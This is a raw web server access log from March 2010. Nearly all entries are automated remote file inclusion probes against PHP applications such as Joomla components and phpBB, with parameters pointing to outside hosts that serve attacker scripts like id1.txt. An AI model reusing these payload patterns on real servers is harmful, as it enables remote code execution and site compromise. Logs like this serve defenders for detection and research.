78.46.87.243 - - [04/Mar/2010:10:18:46 -0800] "GET /logs/access_100211.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:19:04 -0800] "GET /logs/access_100224.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:19:10 -0800] "GET /logs/access_100211.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:10:19:16 -0800] "GET /logs/access_100201.log//bbs///skin/buzzard_espoon/setup.php?dir=http://boats.uksi.ru/sh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:19:52 -0800] "GET /logs/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:19:52 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:19:52 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:19:52 -0800] "GET /become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:20:21 -0800] "GET /logs/access_091210.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:21:02 -0800] "GET /logs/access_091026.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.227.136.138 - - [04/Mar/2010:10:21:02 -0800] "GET /logs///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.227.136.138 - - [04/Mar/2010:10:21:02 -0800] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "puaga.com"
78.24.9.88 - - [04/Mar/2010:10:21:05 -0800] "GET /logs/access_100203.log////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:21:21 -0800] "GET /logs/access_100226.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:10:22:19 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:10:22:41 -0800] "GET /logs/access_100202.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:25:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:25:16 -0800] "GET /logs/access_100205.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:25:17 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:10:25:20 -0800] "GET /logs/access_100128.log///delete_comment.php?board_skin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:10:25:20 -0800] "GET //delete_comment.php?board_skin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:10:25:20 -0800] "GET /logs///delete_comment.php?board_skin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:25:37 -0800] "GET /logs/access_100128.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:25:54 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:25:54 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:25:56 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:10:26:57 -0800] "GET /logs/access_100201.log///delete_comment.php?board_skin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:26:59 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:26:59 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:26:59 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:10:27:08 -0800] "GET /logs/access_100128.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:28:57 -0800] "GET /logs/access_100226.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:29:18 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:29:18 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:29:26 -0800] "GET /logs/access_100226.log//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:29:55 -0800] "GET /logs/access_100220.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:29:55 -0800] "GET /logs//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:29:55 -0800] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:29:56 -0800] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:29:56 -0800] "GET /logs/access_100220.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:29:56 -0800] "GET /logs//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:30:00 -0800] "GET /logs/access_100217.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:30:01 -0800] "GET /logs/access_100217.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:30:32 -0800] "GET /logs/access_100220.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:30:34 -0800] "GET /logs/access_100220.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:30:37 -0800] "GET /logs/access_100217.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:10:30:39 -0800] "GET /logs/access_100217.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:33:09 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:33:16 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [04/Mar/2010:10:34:53 -0800] "GET /logs/access_100211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [04/Mar/2010:10:34:53 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [04/Mar/2010:10:34:54 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:34:54 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:34:54 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:34:54 -0800] "GET /logs/bad_link.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:34:54 -0800] "GET /bad_link.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:35:06 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:35:06 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:35:06 -0800] "GET /logs/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:35:06 -0800] "GET /bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:37:20 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:37:20 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:37:20 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:37:47 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:37:47 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:37:47 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:38:08 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:10:38:11 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:38:20 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:38:20 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:38:22 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:38:23 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:38:23 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:38:24 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:26 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:26 -0800] "GET /logs/access_100209.log%20%20//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:26 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:37 -0800] "GET /logs/access_100209.log%20%20//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:37 -0800] "GET /logs//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:38 -0800] "GET /index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:44 -0800] "GET /logs/access_100224.log%20%20//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:59 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:59 -0800] "GET /logs/access_100224.log%20%20//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:38:59 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:39:11 -0800] "GET /logs/access_100209.log%20%20//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:39:11 -0800] "GET /logs//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:39:11 -0800] "GET /index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:39:27 -0800] "GET /logs/access_100224.log%20%20//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:39:27 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:39:27 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:39:27 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:04 -0800] "GET /logs//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:04 -0800] "GET /logs/access_100218.log//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:04 -0800] "GET /index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:06 -0800] "GET /logs/access_100218.log//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:06 -0800] "GET /logs//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:06 -0800] "GET /index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:11 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:13 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:24 -0800] "GET /logs/access_100218.log//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:24 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:25 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [04/Mar/2010:10:40:28 -0800] "GET /logs/access_100211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [04/Mar/2010:10:40:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [04/Mar/2010:10:40:28 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:40:32 -0800] "GET /logs/access_100213.log//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:40:40 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:40:41 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:41:41 -0800] "GET /logs/access_100213.log%20%20//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:41:41 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:41:41 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:41:48 -0800] "GET /logs//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:41:48 -0800] "GET /logs/access_100213.log%20%20//index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:41:48 -0800] "GET /index.php?phpbb_root_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:41:55 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:41:55 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:41:55 -0800] "GET /logs//OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:41:55 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:41:55 -0800] "GET /OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:10:41:58 -0800] "GET /logs/access_100224.log%20%20//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
